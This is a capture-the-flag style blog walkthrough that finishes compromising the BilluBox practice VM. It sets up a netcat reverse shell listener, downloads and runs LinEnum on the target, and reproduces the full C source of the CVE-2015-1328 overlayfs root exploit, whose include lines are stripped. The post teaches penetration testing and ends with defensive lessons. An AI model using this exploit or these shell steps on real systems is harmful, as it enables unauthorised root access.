Exercise : Final, Taking down billu box penetration testing

Cyber Security Leave a comment

Hallo everyone,

Hurray this will be my final post regarding the penetration testing on billubox for exercising the penetration testing and detail description of walkthough.

On my last post that I found another bug which can be exploited as the alternative to take into the server which can exploited where the malicious file upload by manipulating the image upload validation.

Another fatal bug that we found there is a file inclusion on the application that can be exploited in order to load the malicious file that we have uploaded that lead me to be able to get the remode code injection

lets begin our exploitation

the attack vector of this hack would like the below

  1. Activate the revershe shell
  2. Run the Linux Enum
  3. Examine the result
  4. Find the potential bug to escalate the privilege

Activate the reverse shell

  1. Start your netcat server to listen at specified port
    nc -nlvp 9091
  2. Lets generate the reverse shell using one-lin3r
    – let check what scripting languange it support at the server
    – lets check for python (locate python)
    54-bb
    – We can see that python is installed on the server, so we can use python scripting to create the reverse shell
    – Start the one-lin3r and create the python code

    1. After the code generation done, You can use your remote code injection to execute the python on the remote by using burpsuite56-bb
      Don’t forget to encode your payload since it contain some special character so that it can be trasnfered via http post to become like this below
      57-bb
      Then you can post the request to the server and wait for the reverse connection get connected to your netcat server58-bb
      Tips :
      – The reverse shell need to be finalize in order to get the feel of like local console such as tab completion, clear function and many other. You can finalize using the below command
      – to activate bash console on the remote : python -c ‘import pty; pty.spawn(“/bin/bash”)’
      – To activate the tab completion follow below sequence
      -> Ctrl + Z to background your current active reverse shell
      -> stty raw -echo
      -> fg to foreground the last background process
    2. Yes, we are now connected to the our reverse shell. Next to run the linux enumeration script
      – Download linux enumeration script in the remote server (let assum the remote server has internet connection). Change the directory to /tmp or any other directory you have write access
      wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
      chmod +x LinEnum.sh
      – ./LinEnum.sh
      output :      www-data@indishell:/var/tmp$ ./LinEnum.sh#########################################################
      # Local Linux Enumeration & Privilege Escalation Script #
      #########################################################
      # http://www.rebootuser.com
      # version 0.95[-] Debug Info
      [+] Thorough tests = Disabled
      Scan started at:
      Sat Feb 2 14:31:54 IST 2019
      ### SYSTEM ##############################################
      [-] Kernel information:
      Linux indishell 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux
      [-] Kernel information (continued):
      Linux version 3.13.0-32-generic (buildd@toyol) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014
      [-] Specific release information:
      DISTRIB_ID=Ubuntu
      DISTRIB_RELEASE=12.04
      DISTRIB_CODENAME=precise
      DISTRIB_DESCRIPTION=”Ubuntu 12.04.5 LTS”
      NAME=”Ubuntu”
      VERSION=”12.04.5 LTS, Precise Pangolin”
      ID=ubuntu
      ID_LIKE=debian
      PRETTY_NAME=”Ubuntu precise (12.04.5 LTS)”
      VERSION_ID=”12.04″………………………………….. truncated output ……………………………………………………- Based on the output of LinEnum.sh we can see that the linux is Ubuntu 12.04 Pangolin with Kernel 3.13.0-32.
      – Lets google the exploit, I found the privilege escallation exploit at exploitDB with this URL https://www.exploit-db.com/exploits/37292

      /*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define LIB "#include \n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);

    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";

    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");

    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }

    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}

int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;

    fprintf(stderr,"spawning threads\n");

    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }

            waitpid(pid, &status, 0);

        }

        waitpid(init, &status, 0);
        return 0;
    }

    usleep(300000);

    wait(NULL);

    fprintf(stderr,"child threads done\n");

    fd = open("/etc/ld.so.preload",O_WRONLY);

    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }

    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}

      – follow the steps below

Yeah finally we are gaining the root access. This is here our final jouney of penetration testing for BilluBox. This box is very good for exercises.

Lesson learn of the exploit

  1. Combination of mistake made by the application developer and OS admin would result a fatal incident of hijacking a server
  2. System administrator shall aware that operating system should maintained not only its availablity but also security where at least following the latest patches that requires to be deployed.
  3. Application developer shall have the knowledge of OWASP or Company could follow SSDLC (Secure Software Development Life Cycle) methodology in order to develop their application.

in the next post I will guide you for covering the track later after we can get access to the server. It is called post exploitation task.

OK See you in the next post

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s